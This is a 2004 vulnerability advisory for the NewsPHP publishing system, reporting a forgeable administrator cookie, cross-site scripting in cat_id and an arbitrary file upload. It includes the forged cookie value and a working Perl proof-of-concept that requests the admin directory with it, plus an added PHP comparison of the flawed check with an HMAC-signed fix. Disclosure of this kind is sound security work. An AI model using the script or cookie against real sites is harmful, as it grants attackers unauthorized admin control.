
NewsPHP Admin Access and Cross Site Scripting Vulnerability
Date: 2004-04-12

Security-Corporation ID : SC-1007
URL : http://www.security-corporation.com/articles-20040412-001.html
Author : Manuel Lopez <mantra@gulo.org>
Product : NewsPHP (All versions)
Source Message Contents :

#Title: XSS, Admin Access via Cookie and File Upload vulnerability in

#Software: NewsPHP (All versions)
#Vendor: http://www.newsphp.com
#Underlying OS: All


NewsPHP is a perfect solution for creating a web publishing system, such as an
online magazine, newspaper, TV/Radio site or news portal. It also works as a
Content Management System that is easy to install and manage, without having
to upload your pages over FTP every time you need to update them.


A security vulnerability in the product allows attackers to cause the
product to think they are administrators by placing a fake Administrator
cookie on their computer.

A File Upload vulnerability in the Admin panel allows authenticated users
to upload arbitrary files instead of a video file.

The product is also vulnerable to Cross-Site Scripting.

#Cookie Vulnerability#

The flaw exists because cookie data is not properly checked for
administrator rights.

This is the cookie and POC to gain administrator privileges in NewsPHP:

### autorized=admin; root=admin ###

## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------

#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm

use IO::Socket;

# Print usage and stop when fewer than three arguments are given.
if (@ARGV < 3)
{
    print "\n\n";
    print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
    print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
    print "By: Manuel Lopez mantra at gulo.org\n";
    print "\n\n";
    exit(1);
}

$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];

print "\n";
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
# Request the admin directory with the cookie shown above.
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin

fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
# Save the server's response to the output file.
open( Result, ">$fichero");
print Result while <$socket>;
close Result;
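
The cookie flaw above, shown as an assumed vulnerable check beside a hardened one in PHP. This is an added example, not code from the advisory or from NewsPHP: the function names, the admin_token cookie and the token format are assumptions, and the fix shown (an HMAC-signed, expiring token) is one option alongside keeping the role in a server-side session.

```php
<?php
// Added example, not NewsPHP source. Function names, the admin_token cookie
// and the token layout are assumptions made for illustration.

// Assumed reconstruction of the flaw the advisory reports: the role is taken
// directly from client-controlled cookie values.
function is_admin_vulnerable(array $cookies): bool
{
    return ($cookies['autorized'] ?? '') === 'admin'
        && ($cookies['root'] ?? '') === 'admin';
}

// Called by the server only after a successful password check.
function issue_admin_token(string $user, string $key, int $expires): string
{
    $payload = $user . '|' . $expires;
    return $payload . '|' . hash_hmac('sha256', $payload, $key);
}

// Hardened check: accept the cookie only if its MAC verifies under a
// server-side secret and the expiry time has not passed.
function is_admin_hardened(array $cookies, string $key, int $now): bool
{
    $parts = explode('|', $cookies['admin_token'] ?? '');
    if (count($parts) !== 3) {
        return false;
    }
    [$user, $expires, $mac] = $parts;
    $expected = hash_hmac('sha256', $user . '|' . $expires, $key);
    return hash_equals($expected, $mac)   // constant-time comparison
        && ctype_digit($expires)
        && (int) $expires > $now;
}

// Constructed sample input.
$key    = random_bytes(32);  // server-side secret, never sent to the client
$now    = time();
$forged = ['autorized' => 'admin', 'root' => 'admin'];  // cookie from the advisory
$valid  = ['admin_token' => issue_admin_token('editor1', $key, $now + 900)];
$tamper = ['admin_token' => str_replace('editor1', 'intruder', $valid['admin_token'])];

// The forged cookie satisfies only the flawed check; the hardened check
// accepts only the untampered, server-issued token.
var_dump(is_admin_vulnerable($forged));
var_dump(is_admin_hardened($forged, $key, $now));
var_dump(is_admin_hardened($valid, $key, $now));
var_dump(is_admin_hardened($tamper, $key, $now));
```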


#Cross-Site Scripting#

A remote user can conduct cross-site scripting attacks due to an input
validation flaw in the cat_id variable.


#File Upload vulnerability#

A user with privileges can upload executable code instead of a video in the
Panel. Once the code has been uploaded, a user can execute it by calling the
file; it will be executed with the privileges of the web server.


There is no solution at the moment.
Vendor contacted Apr 3 2004


Manuel Lopez, mantra@gulo.org

